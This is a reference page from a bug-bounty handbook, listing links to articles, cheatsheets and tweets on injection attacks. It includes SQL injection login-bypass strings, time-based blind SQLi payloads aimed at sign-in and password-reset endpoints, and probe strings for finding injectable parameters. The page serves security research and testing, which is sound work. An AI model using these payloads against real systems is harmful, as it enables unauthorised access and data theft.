Bug Hunter Handbook
  • Introduction
  • Getting Started in InfoSec and Bug Bounties.
  • Presentations
  • Checklists / Guides
  • Useful Twitter Threads
  • List of Vulnerabilities
    • Recon and OSINT
      • Recon
      • Sensitive information using Github
      • Subdomain Enumeration
        • Resolvers
      • Javascript Enumeration
      • After Recon
      • Finding Information Using Public Resources
      • OSINT
      • Cloud
      • Wayback
      • Parameter / Content Discovery
      • Broken Link Highjacking
    • Host Header
    • Injection
      • Other Injection
    • DNS Rebinding
    • Cross Site Scripting (XSS)
      • Weaponizing XSS
      • WAF Bypass
    • Cross Origin Resource Sharing (CORS)
    • Local / Remote File Inclusion (LFI / RFI)
    • Server Side Request Forgery (SSRF)
    • Remote Code Execution (RCE)
    • XML Entity Injecton (XXE)
    • Price Manipulation
    • Directory / Path Traversal
    • Cross Site Request Forgery (CSRF)
      • JSON CSRF
    • Password Reset
    • Login Page Issues
    • Deserialization Attacks
    • File Upload
    • Account Takeover
    • Insecure Direct Object References (IDOR)
    • Open Redirect
    • Business Logic Flaws
    • Rate Limit Bypass / 2FA / OTP Bypass
    • Ruby on Rails
      • Mass Assginment
    • S3 Bucket
    • Race Condition
    • CRLF
    • SSTI
    • Prototype Pollution
  • Approach
  • API Security
  • Mobile Security
  • Fuzzing / Wordlists
  • BugBounty Short Write-ups
  • Burp Suite Tips and Tricks
  • HackerOne Reports
  • Response Manipulation
  • Client Vs Server Side Vulnerabilities
  • DevSecOps
  • Containers
    • Docker
    • Kubernetes
    • Containers
  • AWS
  • Azure
  • Others
    • Code Review
    • Web Sockets
    • Web Cache
    • HTTP Desync Attacks
    • Zone Transfer
    • CSP Bypass
    • Payment Bypasses
    • Http Parameter Pollution
    • Postmessage
    • Others
    • GraphQL
    • Unix / Linux
    • Email Related
    • Dependency confusion
    • Nginx Misconfigs
    • JIRA
    • OAUTH
  • Chaining of Bugs
  • Bug Bounty Automation
  • Mindmaps
  • Oneliner Collections
  • Red Teaming
  • Blue Teamining
  • Recon One Liners
  • Misc
  • Wordpress
  • Fuzzing / FuFF
  • OWASP ZAP
  • Bug List
  • Setting up burp collaborator
  • Admin Panel PwN
  • Credential Stuffing / Dump / HaveibeenPwned?
  • Tools Required
  • Nuclei Template
  • Other BugBounty Repos / Tips
  • Interview
  • Threat Modelling
  • AppSec
Powered by GitBook
On this page

Was this helpful?

  1. List of Vulnerabilities

Injection

References for Injection Attacks

PreviousHost HeaderNextOther Injection

Last updated 3 years ago

Was this helpful?

Blogs / Articles:

  • -Blind Command Injection - SSRF

  • Practical JSONP Injection -

  • XSLT Server Side Injection Attacks

  • Log Injection -

  • Remote Code Execution with EL injection -

  • Argument Injection -

  • Argument Injection -

  • Argument Injection -

    • Video -

  • AST Injection, Prototype Pollution to RCE -

  • SSTI -

  • Command Injection -

  • CSS Injection -

  • SQL Injection -

Payloads / Cheatsheets:

Twitter Threads / Tips:

  • EL Injection

Tools:

Other References:

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

-

SPEL Injection -

https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3
https://threat.tevora.com/stop-collaborate-and-listen/
https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
Practical JSONP Injection
https://contextis.com/blog/xslt-server-side-injection-attacks
https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/
https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/
https://staaldraad.github.io/post/2019-11-24-argument-injection/
https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68
https://www.youtube.com/watch?v=FHiJnw9TTX8
https://blog.p6.is/AST-Injection/#How-to-Detect
https://blog.isec.pl/beyond-ssti/
https://bad-jubies.github.io/Blind-SQLi-1/
https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z
https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092
https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1
https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716
https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b
https://twitter.com/rodoassis/status/1438186092486877190?s=20
https://outpost24.com/blog/X-forwarded-for-SQL-injection
How I Escalated a Time-Based SQL Injection to RCE
https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398
https://github.com/Gabriel-Labs/OOB-SQLi
https://github.com/xer0days/SQLi-Query-Tampering
https://twitter.com/Xer0Days/status/1292488714241941504?s=20
1. Time Based SQL Injection : Used payload: '+(select*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters [Like username, email, otp] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )
Time based SQLi -> forgot password Endpoin
1. Payload used: '%2b(select*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint
https://twitter.com/h1pmnh/status/1425831338234589184?s=20
Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection